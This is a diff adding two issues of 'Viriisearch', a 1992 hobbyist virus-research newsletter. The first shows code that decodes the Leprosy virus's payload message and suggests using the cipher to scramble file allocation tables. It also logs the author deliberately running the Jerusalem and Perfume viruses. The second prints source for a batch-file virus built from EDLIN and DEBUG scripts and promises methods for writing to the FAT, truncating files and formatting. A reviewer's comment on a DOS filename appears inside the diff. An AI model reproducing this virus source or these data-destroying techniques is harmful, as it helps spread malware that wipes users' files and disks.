+ + + +When a string is passed to the "print_s" function, it is un-encrypted. + + + +print_s(virus_msg[0]); + +print_s(virus_msg[1]); + +print_s(virus_msg[2]); + + + +would result in the following being printed to the screen: + +------------------------------------------------------------ + + + + NEWS FLASH!! Your system has been infected with the + + + + incurable decay of LEPROSY 1.00, a virus invented by + + + + PCM2 in June of 1990. Good luck! 
+ + + +----------------------------------------------------------- + + + +The compiler I currently use does not accept inline assembly + +code as the author of leprosy had in his source so I modified + +the "print_s" function so I could compile it: + + + +For those interested, I use Microsoft Quick C (C) Microsoft + + + +----------------------------------------------------------- + + + +/* NOTE: I removed the . from the end of each message because that is */ + +/* A $ when un-encrypted, and the $ to terminate the string is only */ + +/* required for the assembly version of the "print_s" function */ + + + +/* Also: The hexadecimal constants in the strings are as follows: */ + + + +/* \x13 = TAB, \x7f = u, \x83 = y, \x81 = w, \x80 = v */ + + + + + +#include + +#define CRLF "\x17\x14" + +char *virus_msg[3] = + +{ + +CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro", + +CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83", + +CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14" + +}; + + + +void print_s (char *s); + +int main (void); + + + +main() + +{ + +print_s(virus_msg[0]); + +print_s(virus_msg[1]); + +print_s(virus_msg[2]); + +} + + + +void print_s (char *s) { + + char *p = s; + + while ( *p ) { + + *p -= 10; + + p++; + + } + + printf("%s\n",s); + +} + + + +----------------------------------------------------------------------------- + + + +*p -= 10; is what does it all. It adds the value of 10 to each character and + +can be used either way, to unencrypt or to encrypt. + + + +if you change it to: *p += 10; + + + +it will then encrypt. + + + +You can also change it to: + + + +*p -= rand() % 35000; /* #include for "rand()" */ + + + +and it will change the value it uses to encrypt or un-encrypt everytime it + +passes through the "while" loop or you can change it to any value you like. 
+ + + +----------------------------------------------------------------------------- + + + +This method of encryption can be used to encrypt files, file allocation + +tables, boot sectors, etc. All you need is a function that reads and writes + +either of the three. For instance, read the contents of the File Allocation + +Table, and pass the string(s) through the print_s function and then write + +the encrypted string(s) back to the File Allocation Table. I don't suggest + +doing this to your hard drive, or anyone elses, for it will result in either + +you or the other person having to crack the encryption and restore the FAT + +manually, or formatting the hard drive and replacing all the files. If you + +want to experiment, do it on a floppy, like I did. + + + +----------------------------------------------------------------------------- + + + + + +The "uncompress" virus + + + +----------------------------------------------------------------------------- + + + +According to the person who uploaded it to the BBS where I got it from, this + +virus infects when you uncompress the file. + + + +I did not find any indication of this when I uncompressed the file, called + +NJERU.ARJ. It is a Arkanoid II: Revenge Of Doh crack released by FiRM that + +is infected with a strain of Jerusalem-4. + + + +I ran it and Norton Anti Virus (C) Symantec reported the virus in memory. + +I then proceeded to run EDLIN.EXE (C) Microsoft, SYS.COM (C) Microsoft, + +COMMAND.COM (C) Microsoft, and ARJ.EXE (C) Robert K. Jung to see what would + +happen. These are the results: + + + +Filename: Original Size: Size After Infection: + + + +EDLIN.EXE 14,121 bytes 15,936 bytes + +ARJ.EXE 98,968 bytes 100,784 bytes + +SYS.COM 13,440 bytes 15,253 bytes + + + +There were no size changes to COMMAND.COM, nor was it infected. + + + +A file was also created by the virus called "NJVR._OO" that was around 26K + +but only had one line in it, a error message concerning the media of the disk. 
+ +Sorry, the exact size of the file NVJR._OO and the exact message are not + +available. When I attempted to remove the apparent text file using the + +MS-DOS "DEL" command, it displayed the error message and tried to write to + +drive A which was write protected at the time. Then it went back to drive B + +and apparently did damage to the media. I formatted the disk and it was fine + +afterwards. I have never seen anything like this before, a text file being + +able to do damage just by attempting to delete it. I guess it wasn't a text + +file after all but I still have no idea how it managed to corrupt the media + +on drive B. It also created a file called "N" which was 0 bytes and couldn't + +be deleted or read by Norton Anti Virus. + + + +----------------------------------------------------------------------------- + + + +"Suicidal Tendencies" Department. + + + +(Appropriately named department: I can't believe I am deliberately running + +a virus on my system) + + + +This section of the newsletter will cover what happened when I run a virus + +on a floppy with MSDOS.SYS, IO.SYS, COMMAND.COM, a overlay file, a .EXE file + +and a few other assorted files on it. + + + +The virus of the month award goes to: The Perfume Virus + + + +----------------------------------------------------------------------------- + + + +What Happened: + + + +----------------------------------------------------------------------------- + + + +Filename: PERFUME.COM Filesize: 806 bytes + + + +Ok, I placed this file on drive B with the following files: + + + +Filename: Original Size: + +---------------------------------- + +COMMAND.COM 47845 + +MSDOS.SYS 37394 + +IO.SYS 33430 + +ANSI.SYS 9029 + +RAMDRIVE.SYS 5873 + +CONFIG.SYS 39 + +UNDELETE.EXE 13924 + +AUTOEXEC.BAT 69 + +15ALL05.DEF 67278 + +MICHEL.DEF 456 + +NSETUP.OVL 876 + +PKUNZIP.EXE 23528 + +---------------------------------- + + + +When I ran PERFUME.COM, it displayed the message: This is a tiny COM program. 
+ +and it infected COMMAND.COM, enlarging it by 765 bytes to 48,610 bytes. + +It then proceeded to remove the hidden/system attribute from MSDOS.SYS but + +didn't infect it and then attempted to infect the disk in drive A, which was + +write protected at the time. The virus, realizing it couldn't write to drive + +A, displayed the message: + + Not ready reading drive A + + Insert disk with \COMMAND.COM in drive A + + Press any key to continue . . . + + + +Now, usually when DOS displays that message, it only needs to READ, and still + +could've if the disk was write protected, so evidently the virus was + +trying to outsmart me and fool me into thinking that was a DOS message so it + +could infect at least one more disk. + + + +I ran Norton Anti Virus v2.0 (C) Symantec, and it reported Perfume in memory + +so I re-booted and ran NAV again, this time it didn't report the virus being + +in memory, but did identify COMMAND.COM and PERFUME.COM as being infected. + + + +Also: + + + +In my search for the virus of the month, I came across a file called + +"ISRAELI.ZIP" which I thought to be a virus called "Israeli" but as it turns + +out it was a strain of Jerusalem-4, the same as the supposed "Uncompress + +virus" discussed earlier. The file was called: SORTINFT.EXE and was 3760 + +bytes. When I ran it, it did no damage to the disk or files but NAV did + +report Jerusalem-4 in memory so I re-booted. I then ran NAV again and when + +the screen came up saying who the copy of NAV was registered to, it said: + + + +Registered To: + + + +Criminal Mied + +Viriisearch Neletter, Inc. + + + +Weird eh? And that's not all, I went to scan memory, and the little window + +came up that it displays the name of the current virus being scanned for, but + +that's it, no names were displayed. The program appeared to freeze up, and + +the disk kept spinning with the drive light on. I re-booted once again and + +ran NAV again. 
The weird letters were still there but it scanned memory no + +problem this time. I exited it from NAV and went to drive B to delete files + +when I noticed a file called: NRVN E._OO that was 4096 bytes long. Since when + +does DOS allow spaces in filenames? As a result I couldn't view it or delete + +it by typing: C>DEL NRVN E._OO so I typed: C>DEL *._OO and that worked. At + +one point a message also came up on the screen: "File Allocation Table Bad, + +Drive B". I imagine Jerusalem-4 was responsible for the weird file name and + +the bad FAT on drive B. I have no idea why NAV was acting funny, possibly + +a genuine disk error and not due to a virus, since the disk was always write + +protected. + + + +----------------------------------------------------------------------------- + + + +Well, that's it for "Suicidal Tendencies" for this month! + + + +I don't recommend trying this on any computer with a hard drive. I do not have + +a hard drive on the machine I do my experimenting on, so if I am careful and + +keep the virus isolated to one disk, I have nothing to worry about. + + + +----------------------------------------------------------------------------- + + + +Anti Viral Software: + + + +----------------------------------------------------------------------------- + + + +Here are some nice virus scanners/anti viral programs to check out: + + + +----------------------------------------------------------------------------- + + + +Scan v89b (C) McAfee - available on most Public Domain BBSes + + + +Clean v89b (C) McAfee - available on most Public Domain BBSes + + + +Norton Anti Virus v2.0 (C) Symantec + + + +Central Point Anti Virus (C) Central Point Software + + + +There are a few others, but I think the above four are the best. I use + +Norton Anti Virus and Scan. 
+ + + +----------------------------------------------------------------------------- + + + +Some things you should know: + + + +----------------------------------------------------------------------------- + + + +Most people assume that a hard drive in a newly purchased computer, or a new + +program still in the shrinkwrap are always virus free. Well, this is just not + +true. The reported cases are few and far in between, but today anything can + +happen, and it has. A certain computer company shipped out 500 of their + +computers infected with the Michaelangelo virus, which started the whole + +panic in the first place. And there have been a few times where someone bought + +a brand new program, took it home and started using it, not expecting it to + +be infected with a virus. Well, it was. After all, people create virii and + +people work at computer companies, and software distributors. So what's + +stopping a pissed off employee from infecting a computer or a program? Nothing + +at all. + + + +How you take this information is entirely up to you. + + + +If you call a BBS and they say they scan for virii, don't assume that every + +single file will be virus free, some can sneak through. There is also the + +possibility of a unknown virus that was not detected by the scanner. + + + +Last but not least: ALWAYS BACK UP YOUR DATA!!! + + + +Philosophy Dept: + + + +"Knowledge is power" - Francis Bacon, 16th Century Philosopher + + + +"Even if a computer is locked, sealed in concrete, placed in a lead room and + +surrounded by armed guards, I'd still have my doubts." + + + +Those aren't the exact words and I forget who said that, but it is quite + +appropriate and all too true. + + + +I hope you enjoyed this issue of "Viriisearch" The newsletter dedicated + +entirely to computer virii. + + + + + +Until Next Time......Be Careful!!! 
+ + + + * Criminal Minded * + +----------------------------------------------------------------------------- + + + +Downloaded From P-80 International Information Systems 304-744-2253 + diff --git a/textfiles.com/virus/cmvs-2.v1 b/textfiles.com/virus/cmvs-2.v1 new file mode 100644 index 00000000..a94157d2 --- /dev/null +++ b/textfiles.com/virus/cmvs-2.v1 
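Review bot: The "NRVN E._OO" episode near the end of the issue is left unexplained ("Since when does DOS allow spaces in filenames?"), and a one-line note would make the observation useful to readers: an 8.3 directory entry stores raw bytes, so a corrupted entry can contain a space that COMMAND.COM's parser treats as an argument separator, which is exactly why "DEL NRVN E._OO" fails while the wildcard "DEL *._OO" matches and removes it. Worth recording alongside the "File Allocation Table Bad, Drive B" message, since both point to directory/FAT corruption on that disk rather than to NAV misbehaving.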
@@ -0,0 +1,3582 @@ +DISCLAIMER: + +The author will NOT accept responsibility for any damage to your + +computer media and/or files, or responsibility for any action you might + +take that will result in legal proceedings, the source code, if any, in + +this newsletter is THE REAL THING, and you, after you read this, will be + +well aware of what virii are capable of, and knowing that, it is expected + +that you will act responsibly. + + + +DISCLAIMER II: + +All I know about programming I have learned on my own, and did not go to + +school for, and am still learning. As a result, I am sometimes prone to + +make mistakes, and be wrong about things, so please be patient if I should + +make a mistake, or say something that isn't true, which would be totally + +unintentional. + + + + + + Viriisearch + + ----------- + + + + The Virus Research Newsletter + + + + Volume 1, Number 2 + + + + 7/2/92 + + + +CREDITS: + +----------------------------------------------------------------------------- + +Author...................................................Criminal Minded + +Editor...................................................Criminal Minded + +Ideas, Source, Examples Supplied By......................Criminal Minded + +Facts Stolen From Several Sources By.....................Criminal Minded + +----------------------------------------------------------------------------- + + + +Introduction: + + + +Welcome To The Second Issue Of Viriisearch, The Virus Research Newsletter. + + + +In this issue: + + + +Batch File Virii: How Effective Are They? + + + +Methods Used To Do The Following: + + + +1. Removing/Altering Attributes On Files + +2. Writing To The File Allocation Table + +3. Truncating Files To 0 Bytes (They cannot be recovered with this method, + + but it is rather slow) + +4. Saving/Restoring File Dates/Times + +5. 
Formatting + + + +Fun With COMMAND.COM + +Sample Source Code Of Virii + +"Suicidal Tendencies" Department/Virus Of The Month + +Final Notes + + + +----------------------------------------------------------------------------- + + + +Batch File Virii: How Effective Are They? + + + +----------------------------------------------------------------------------- + + + +This Is A Batch File Virus: + + + +----------------------------------------------------------------------------- + +echo = off + +ctty nul + +path c:\msdos + +dir *.com/w>ind + + + +edlin ind<1 + +debug ind<2 + +edlin name.bat<3 + +ctty con + +name + + + +----------------------------------------------------------------------------- + + + +This is what each line in the batch file does: + + + +Line: What It Does: + +----------------------------------------------------------------------------- + +echo = off Turns Echo Off + +ctty nul Turns Console Output Off + +path c:\msdos Sets up the path in the environment as C:\MSDOS + +dir *.com/w>ind Redirects the output of the command "DIR *.COM/W to a + + File Called "IND" + + + +edlin ind>1 Edits "IND" File Using The Edlin Commands In "1" + +edlin ind>2 Edits "IND" File Using The Edlin Commands In "2" + +edlin name.bat>3 Edits "NAME.BAT" Using The Edlin Commands In "3" + +ctty con Restores Output To The Console + +name Runs NAME.BAT + + + +----------------------------------------------------------------------------- + + + +Contents Of The File "1" + + + +----------------------------------------------------------------------------- + + + +1,4d ( Here line 1-4 of the "IND" file are deleted ) + +e ( Save file ) + + + +----------------------------------------------------------------------------- + + + +Contents Of The File "2" + + + +----------------------------------------------------------------------------- + + + +m100,10b,f000 (First program name is moved to the F000H address to save) + + + +e108 ".BAT" (Extention of file name is changed to .BAT) + +m100,10b,f010 
(File is saved again) + +e100"DEL " (DEL command is written to address 100H) + +mf000,f00b,104 (Original file is written after this command) + +e10c 2e (Period is placed in from of extension) + +e110 0d,0a (Carrige return+ line feed) + +mf010,f020,11f ( Modified file is moved to 11FH address from buffer area) + +e112 "COPY \VR.BAT" ( COPY command is now placed in front of file) + +e12b od,0a (COPY command terminated with carriage return + lf) + +rxc ( The CX register is ... ) + +2c ( set to 2CH) + +nname.bat ( Name it NAME.BAT) + +w ( Write ) + +q ( quit ) + + + +----------------------------------------------------------------------------- + + + +Contents Of The File "3" + + + +----------------------------------------------------------------------------- + + + +0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79 + + 1 , 1 ? . . n y y y y y y y + +0110 79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79 + + y . 2 , ? ? r . . n n y y y + +0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00 + + y y y y . E . . . . . . . . . + + + +----------------------------------------------------------------------------- + + + +Ok, according to the author, this batch file makes use of EDLIN and DEBUG + +and only affects .COM files. + + + +I ran it twice, first on one of my DOS bootable disks. 
This is the directory + +listing of that disk before I ran this supposed "batch file virus" + + + + Volume in drive A has no label + + Volume Serial Number is 004A-1EC0 + + Directory of A:\ + + + +COMMAND COM 47845 04-09-91 5:00a + +ANSI SYS 9029 04-09-91 5:00a + +RAMDRIVE SYS 5873 04-09-91 5:00a + +CONFIG SYS 39 01-01-80 12:04a + +SYS COM 13440 04-09-91 5:00a + +NDOS COM 2419 08-14-84 12:00p + +UNDELETE EXE 13924 04-09-91 5:00a + +MEM EXE 39818 04-09-91 5:00a + +SFORMAT EXE 64921 08-05-91 6:01a + +DEBUG EXE 21692 06-07-90 2:24a + +EDLIN EXE 14121 06-07-90 2:24a + +ATTRB EXE 6232 01-01-80 12:21a + +AUTOEXEC BAT 69 01-01-80 12:02a + +NORTON INI 530 01-01-80 12:01a + +VR BAT 112 01-01-80 7:00p + +1 10 01-01-80 7:01p + +2 171 01-01-80 7:04p + +3 269 01-01-80 7:08p + + 18 file(s) 240514 bytes + + 353280 bytes free + + + +----------------------------------------------------------------------------- + + + +Ok, I ran VR.BAT and it accessed the disk for about 30 seconds and then the + +computer froze up. So I rebooted and looked at the disk. 
There was no file + +damage, but there were four new files on the disk: + + + +IND 120 bytes + +IND.BAK 209 bytes + +NAME.BAT 120 bytes + +NAME.$$$ 0 bytes + + + +----------------------------------------------------------------------------- + + + +This is the contents of "IND" + + + + + +COMMAND.COM SYS.COM NDOS.COM + + 3 file(s) 63704 bytes + + 286720 bytes free + + + +----------------------------------------------------------------------------- + + + +This Is The Contents Of "IND.BAK" + + + +----------------------------------------------------------------------------- + + + + Volume in drive A has no label + + Volume Serial Number is 004A-1EC0 + + Directory of A:\ + + + +COMMAND.COM SYS.COM NDOS.COM + + 3 file(s) 63704 bytes + + 286720 bytes free + + + +----------------------------------------------------------------------------- + + + +And This Is The Contents Of "NAME.BAT" + + + +----------------------------------------------------------------------------- + +del MMAN.bat. S + +copy \vr.batO + +COMMAN.bat + + 3 file(s) 63704 bytes + + 286720 bytes free + + + +----------------------------------------------------------------------------- + + + +I Then Proceeded To Run NAME.BAT and all that did was give me a "File Not + +Found" And A Few "Bad Command Or Filename"'s + + + +I Am Not Too Sure Of What This Individual Was Attempting To Do, But I Would + +Not Be Too Worried About Him Being Capable Of Doing Anything Malicious To + +Your System As His Batch File Virus Is A Piece Of Shit. + + + +Also, I Created A Directory Called MSDOS On The Disk, Copied COMMAND.COM, + +SYS.COM, And NDOS.COM To That Directory And Ran VR.BAT again. It Did The Same + +Thing As Before, And Did Not Do Any Damage To The Files In The Root Directory + +Or A:\MSDOS + + + +----------------------------------------------------------------------------- + + + +Methods Used To Do The Following: + + + +1. Removing/Altering Attributes On Files + +2. Writing To The File Allocation Table + +3. 
Truncating Files To 0 Bytes + +4. Saving/Restoring File Dates/Times + +5. Formatting + + + +----------------------------------------------------------------------------- + + + +Removing/Altering Attributes On Files: + + + +----------------------------------------------------------------------------- + + + +Here Is A Simple C Language Source To Change The Attributes To Normal On A + +File Called "TEST.DAT" + + + +----------------------------------------------------------------------------- + + + +#include + + + +int main (void); + + + +main() + +{ + + _dos_setfileattr("TEST.DAT", _A_NORMAL); + +} + + + +----------------------------------------------------------------------------- + + + +I Think It's Pretty Much Self-Explanatory. Is Just The Header File + +That Has The Prototype For "_dos_setfileattr" In It And The Definition For + +The Manifest Constant "_A_NORMAL" + + + +int main (void); + + + +Is The Function Prototype For "main()" Declaring It To Return Type "int" And + +Is Passed No Parameters (void). This Is Keeping Up With The ANSI Standard. + + + +Then _dos_setfileattr("TEST.DAT",_A_NORMAL); + + + +which does the actual attribute change. + + + +----------------------------------------------------------------------------- + + + +Now, A Complete Utility To Change Attributes That I Wrote On 09/16/91. This + +Is The Third Revision Of It, Version 3.0. I Am Proud Of This Particular + +Version, As The Source Code Is 92 Lines, and 3238 Bytes. The Executable Is + +9165 Bytes, Which Is Relatively Small. That Just Shows That This Is A Well + +Written Utility, Especially Compared To Version 1.0, Which Was 1/3 Of The + +Lines, And The Executable Was Around 20K. 
+ + + +----------------------------------------------------------------------------- + + + +#include + +#include + +int count1=0,loop=0; + + + +main(argc,argv) + +int argc; + +char *argv[]; + +{ + +if (argc != 2) { + + printf("Usage: C>ATTRB \n\n"); + + printf("File Attributes Changer v3.0 Written By Criminal Minded.\n"); + + printf("09/16/91.\n"); + + exit(1); + + } + +else { + +struct find_t all_file; + + while (loop!=4) { + + if ((_dos_findfirst(argv[1], _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file)) { + + printf("\nFile(s) do not exist.\n"); + + exit(1); + + } + + else { + + printf("1. Normal\n"); + + printf("2. Read Only\n"); + + printf("3. Hidden\n"); + + printf("4. System\n"); + + printf("5. Hidden/System/Read Only\n\n"); + + printf("Enter Your Choice: "); + +switch(getch()) { + + case '1': loop=4; + + _dos_setfileattr(all_file.name, _A_NORMAL); + + printf("\n\nFile: %s successfully changed to: NORMAL.\n", all_file.name); + + count1++; + + while (_dos_findnext(&all_file) == 0) { + + count1++; + + _dos_setfileattr(all_file.name, _A_NORMAL); + + printf("File: %s successfully changed to: NORMAL.\n", all_file.name); + + } + + printf("\n%d Files.\n", count1); + + break; + + case '2': loop=4; + + _dos_setfileattr(all_file.name, _A_RDONLY); + + printf("\n\nFile: %s successfully changed to: READ ONLY.\n", all_file.name); + + count1++; + + while (_dos_findnext(&all_file) == 0) { + + count1++; + + _dos_setfileattr(all_file.name, _A_RDONLY); + + printf("File: %s successfully changed to: READ ONLY.\n", all_file.name); + + } + + printf("\n%d Files.\n", count1); + + break; + + case '3': loop=4; + + _dos_setfileattr(all_file.name, _A_HIDDEN); + + count1++; + + printf("\n\nFile: %s successfully changed to: HIDDEN.\n", all_file.name); + + while (_dos_findnext(&all_file) == 0) { + + count1++; + + _dos_setfileattr(all_file.name, _A_HIDDEN); + + printf("File: %s successfully changed to: HIDDEN.\n", all_file.name); + + } + + printf("\n%d Files.\n", count1); + + break; + + 
case '4': loop=4; + + _dos_setfileattr(all_file.name, _A_SYSTEM); + + count1++; + + printf("\n\nFile: %s successfully changed to: SYSTEM.\n", all_file.name); + + while (_dos_findnext(&all_file) == 0) { + + count1++; + + _dos_setfileattr(all_file.name, _A_SYSTEM); + + printf("File: %s successfully changed to: SYSTEM.\n", all_file.name); + + } + + printf("\n%d Files.\n", count1); + + break; + + case '5': loop=4; + + _dos_setfileattr(all_file.name, _A_HIDDEN|_A_SYSTEM|_A_RDONLY); + + count1++; + + printf("\nFile: %s successfully changed to: HIDDEN/SYSTEM/READ ONLY.\n", all_file.name); + + while (_dos_findnext(&all_file) == 0) { + + count1++; + + _dos_setfileattr(all_file.name, _A_HIDDEN|_A_SYSTEM|_A_RDONLY); + + printf("\nFile: %s successfully changed to: HIDDEN/SYSTEM/READ ONLY.\n", all_file.name); + + } + + printf("\n%d Files.\n", count1); + + break; + + default: loop=5; + + printf("\n\nThat was not a valid menu selection.\n\n"); + + printf("Please try again:\n\n"); + + break; + + } + + } + + } + + } + +} + + + +----------------------------------------------------------------------------- + + + +"Dissection" Of The Source Code To Attrb v3.0 + + + +----------------------------------------------------------------------------- + + + +int count1=0,loop=0; + + + +This Is Just Global Declaration And Inititialization Of Two Integers, Called + +"count1" and "loop" + + + +You Should Always Initialize Your Integers To Zero, Because "C" Can Sometimes + +Assign The Value To The Integer That Is In The Area Of Memory The Compiler + +Sets Aside For The Integer, Which Could Result In Your Program Not Working + +The Way You Wanted It To. + + + +"count1" keeps track of the number of files whose attributes were changed + +through the use of the "increment operator" ( ++ ) which adds the value of 1 + +to the integer everytime it changes the attribute on a file. 
+ + + +count1++; /* adds the value of 1 to "count1" */ + + + +When there are no more files left to change, it prints the total number of + +files whose attributes were altered with this line: + + + +printf("\n%d Files.\n", count1); + + + +%d is a format specifier, telling the printf function we are printing a int. + +The value to print comes from "count1" at the end, printf looks in there and + +obtains the value, then prints it. + + + +----------------------------------------------------------------------------- + + + +main(argc,argv) + +int argc; + +char *argv[]; + + + +----------------------------------------------------------------------------- + + + +This is how command line parameters are incorporated into programs. argc, a + +integer, keeps track of the number of actual parameters passed. char *argv[] + +is the actual parameter. ATTRB v3.0 takes one command line parameter, a file + +specification. + + + +C>ATTRB30 TEST.DAT + + + +With this, argc would = 2, and argv would be as follows: + + + +argv[0] = "C" + +argv[1] = "TEST.DAT" + + + +argv[0] always has "C" in it. + + + + + +Now, how do you make sure the person using the utility entered the command + +line parameter? Like this: + + + +if (argc != 2) { + + printf("Usage: C>ATTRB \n\n"); + + printf("File Attributes Changer v3.0 Written By Criminal Minded.\n"); + + printf("09/16/91.\n"); + + exit(1); + + } + + + +argc should equal 2, so the line: if (argc!=2) + + + +is saying: if argc doesn't equal 2 (! 
means NOT and = means equal) + + + +If argc doesn't equal 2, that means no command line parameter was passed to + +the program, so it carries out the four lines in between the { and the } + +see below: + + + + printf("Usage: C>ATTRB \n\n"); + + printf("File Attributes Changer v3.0 Written By Criminal Minded.\n"); + + printf("09/16/91.\n"); + + exit(1); + + + +it tells you the "usage" of the program: + + + +Usage: C>ATTRB + + + +telling you it needs one command line parameter, a filespec + + + +then it prints the name of the program, author, and date, and exits with a + +error code of 1. + + + +If argc DOES equal 2, it goes to this part of the program: + + + +Without Comments: + + + +else { + +struct find_t all_file; + + while (loop!=4) { + + if ((_dos_findfirst(argv[1], _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file)) { + + printf("\nFile(s) do not exist.\n"); + + exit(1); + + } + + + +With Comments: + + + +else { /* else do this if the parameter is supplied */ + + + +struct find_t all_file; /* this tells the program we are going to use the */ + + /* structure defined in DOS.H called "find_t" */ + + /* see below for a description of "find_t" */ + + + + while (loop!=4) { /* will keep going until loop doesn't equal 4 */ + + + + /* this next line searches for the filename you specified, using the */ + + /* "bitwise OR" operator, | to OR the attribute manifest constants */ + + /* together, so it will find any file matching the one you specified */ + + /* regardless of the attribute it has. If _dos_findfirst NOT equals */ + + /* 0, that means the file you specified doesn't exist, so it tells */ + + /* you and exits with a error code of 1 */ + + /* Also in this line is where we pass argv[1] over to the "all_file" */ + + /* structure, which is the same as the "find_t" structure. 
We just */ + + /* basically changed the name with the line: struct find_t all_file */ + + + + + + if ((_dos_findfirst(argv[1], _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file) !=0)) { + + printf("\nFile(s) do not exist.\n"); + + exit(1); + + } + + + +----------------------------------------------------------------------------- + + + +OK, let me interrupt here for a brief discussion of the "find_t" structure + +declared and defined in "DOS.H" + + + +----------------------------------------------------------------------------- + + + +The "find_t" structure: + + + + + +struct find_t { + + char reserved[21]; + + char attrib; + + unsigned wr_time; + + unsigned wr_date; + + long size; + + char name[13]; + + }; + + + + + +Ok, a structure is just a simple way of organizing data and you won't have to + +declare the data types every time, you could just use the structure. + + + +The members of this structure are: + + + +char reserved[21]; /* character array, can hold 21 chars. Reserved by DOS */ + +char attrib; /* holds the attribute */ + +unsigned wr_time; /* holds the time of the file */ + +unsigned wr_date; /* holds the date of the file */ + +long size; /* holds the file size */ + +char name[13]; /* holds the filename */ + + + +at the end of the structure is: }; + + + +this signifies the end of it the structure, but because there is no name + +there, we can rename the structure to anything we line, like we did with the + +line: + + + +struct find_t all_file + + + +now had the structure had a name there, such as: + + + +struct find_t { + + char reserved[21]; + + char attrib; + + unsigned wr_time; + + unsigned wr_date; + + long size; + + char name[13]; + + } fileinfo; + + + +we couldn't rename the structure. 
The members of the structure would be + +referred to as: + + + +fileinfo.attrib + +fileinfo.wr_time + +fileinfo.wr_date + +fileinfo.size + +fileinfo.name + + + +but since we renamed the structure to "all_file" + + + +the members are called: + + + +all_file.attrib + +all_file.wr_time + + + +etc and so on... + + + +Get it? Good. Now back to ATTRB v3.0 + + + +----------------------------------------------------------------------------- + + + +We left off here: + + + +else { + +struct find_t all_file; + + while (loop!=4) { + + if ((_dos_findfirst(argv[1], _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file)) { + + printf("\nFile(s) do not exist.\n"); + + exit(1); + + } + + + +As I said, in the 4th line in the above example, argv[1] is passed over to + +the "all_file" structure, so argv[1] from now on will be referred to as: + + + +all_file.name + + + +If the above part of the program does find a matching file, it will go onto + +this part of the program: + + + +Once again, note the "if else" + + + +In English: + + + +if findfile function doesn't find a matching file, print message and exit. + +else do this: + + + + else { + + printf("1. Normal\n"); + + printf("2. Read Only\n"); + + printf("3. Hidden\n"); + + printf("4. System\n"); + + printf("5. Hidden/System/Read Only\n\n"); + + printf("Enter Your Choice: "); + + + +easy eh? + + + +you will notice the { and the } throughout the program, those are VERY, VERY + +important in how your program works. I will cover those after I am done with + +explaining how the program works. + + + +Anyway, the above part of the source just displays the simple menu, showing + +your choices. If you select 1, it will change the attributes of the matching + +files to the normal attribute, 2 will make them read only, etc.... 
+ + + +This is how it gets the input from the user: + + + +switch(getch()) { + + + +getch() is a function which means "get character" + + + +the "switch" allows the use of "case statements" + + + +----------------------------------------------------------------------------- + + + +case '1': loop=4; + + _dos_setfileattr(all_file.name, _A_NORMAL); + + printf("\n\nFile: %s successfully changed to: NORMAL.\n", all_file.name); + + count1++; + + while (_dos_findnext(&all_file) == 0) { + + count1++; + + _dos_setfileattr(all_file.name, _A_NORMAL); + + printf("File: %s successfully changed to: NORMAL.\n", all_file.name); + + } + + printf("\n%d Files.\n", count1); + + break; + + + +----------------------------------------------------------------------------- + + + +11 lines: + + + +Line 1. Will carry out all the functions after case '1': IF the 1 key is + + pressed. Also on the first line: loop=4; + + This gives the value of 4 to the integer "loop" + + + + Earlier in the code, there was: while (loop!=4) + + Which will keep going until the integer holds a value other than 4 + + Since we assign 4 to it at every case statement, it keeps going. + + The purpose of this is if you hit a wrong key, such as 8, which + + isn't available on the menu, it will go to default, where it assigns + + 5 to loop causing it to display this message: + + + + That was not a valid menu selection. + + + + Please try again: + + + + and then "break" out of the loop and go back to the menu, and + + re-display it. 
+ + + +This is how it does it: + + + + default: loop=5; + + printf("\n\nThat was not a valid menu selection.\n\n"); + + printf("Please try again:\n\n"); + + break; + + + +----------------------------------------------------------------------------- + + + +Now back to "case '1'" + + + +----------------------------------------------------------------------------- + + + +case '1': loop=4; + + _dos_setfileattr(all_file.name, _A_NORMAL); + + printf("\n\nFile: %s successfully changed to: NORMAL.\n", all_file.name); + + count1++; + + while (_dos_findnext(&all_file) == 0) { + + count1++; + + _dos_setfileattr(all_file.name, _A_NORMAL); + + printf("File: %s successfully changed to: NORMAL.\n", all_file.name); + + } + + printf("\n%d Files.\n", count1); + + break; + + + +----------------------------------------------------------------------------- + + + +Ok, this picks up where + + + +if ((_dos_findfirst(argv[1], _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file)) { + + + +left off. + + + +_dos_findfirst finds the FIRST matching file and then displays the menu. If + +you select one, it will go to the case '1': statement and change the attribute + +of all_file.name to NORMAL using this line: + + + +_dos_setfileattr(all_file.name, _A_NORMAL); + + + +Then it prints a line telling you the result. %s is another format specifier + +used by printf, like %d mentioned earlier, but %s is to print a string, and + +all_file.name (at the end) contains the string to be printed. + + + +printf("\n\nFile: %s successfully changed to: NORMAL.\n", all_file.name); + + + +Then it adds the value of 1 to count1 to keep track of the total number of + +files attributes were changed on. 
+ + + +count1++; + + + +Once it does all that, it goes onto this part of the code: + + + + while (_dos_findnext(&all_file) == 0) { + + count1++; + + _dos_setfileattr(all_file.name, _A_NORMAL); + + printf("File: %s successfully changed to: NORMAL.\n", all_file.name); + + } + + printf("\n%d Files.\n", count1); + + break; + + + +This is a while loop, until _dos_findnext DOESN'T equal 0, it will keep going + +because as long as it does equal 0, that means there are matching files. The + +next 3 lines have already been explained. Once there are no more files, it + +goes to: + + + + printf("\n%d Files.\n", count1); + + break; + + + +Which prints how many files were changed, breaks out of the loop and exits + +the program. + + + +The only difference between case 1, case 2, case 3, case 4, and case 5, is + +the attribute that the file is changed to. + + + +Case 1: Normal (Can Be Deleted, Written To) + +Case 2: Read Only (Cannot Be Written To Or Deleted) + +Case 3: Hidden (Filename Is Not Seen When You Type DIR, But Still Can Be + + Executed If A .COM, .EXE, or .BAT File, Can Still Be Read If A + + Text File, Etc But Cannot Be Deleted, DOS Replies: File Not Found) + +Case 4: System (Like The File Doesn't Exist. Cannot 